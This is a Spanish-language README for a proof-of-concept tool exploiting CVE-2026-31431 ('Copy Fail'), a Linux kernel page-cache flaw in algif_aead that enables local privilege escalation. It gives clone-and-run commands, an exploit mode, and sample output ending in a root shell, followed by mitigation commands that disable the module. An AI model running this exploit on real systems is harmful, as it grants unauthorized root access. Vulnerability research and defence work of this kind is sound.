
CVE-2026-31431 - Vulnerabilidad de la caché de páginas del kernel de Linux
Este proyecto se proporciona estrictamente para:
El autor y los colaboradores NO son responsables del mal uso, daños, pérdida de datos, interrupción del servicio o cualquier actividad ilegal realizada con este software.
Herramienta de investigación de prueba de concepto para CVE-2026-31431, también conocida como "Copy Fail", una vulnerabilidad del kernel de Linux que afecta la implementación AEAD algif_aead / authencesn.
La vulnerabilidad puede permitir la corrupción de la caché de páginas bajo condiciones específicas, lo que potencialmente conduce a una escalada de privilegios local en sistemas vulnerables.
Clone el repositorio:
git clone https://github.com/Lutfifakee-Project/CVE-2026-31431.git
cd CVE-2026-31431
python3 exploit.py
python3 exploit.py --exploit
Cuando se solicite:
Type 'YES' to continue
python3 exploit.py --cleanup
python3 exploit.py --help
$ python3 exploit.py --exploit
[!] DANGER ZONE: Exploit mode
Type 'YES' to continue: YES
[*] CVE-2026-31431 Copy Fail Exploit
[+] Page cache patching complete!
[+] Executing modified su...
# id
uid=0(root) gid=1001(user)
Si es administrador de sistemas y necesita mitigar la exposición:
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
sudo rmmod algif_aead 2>/dev/null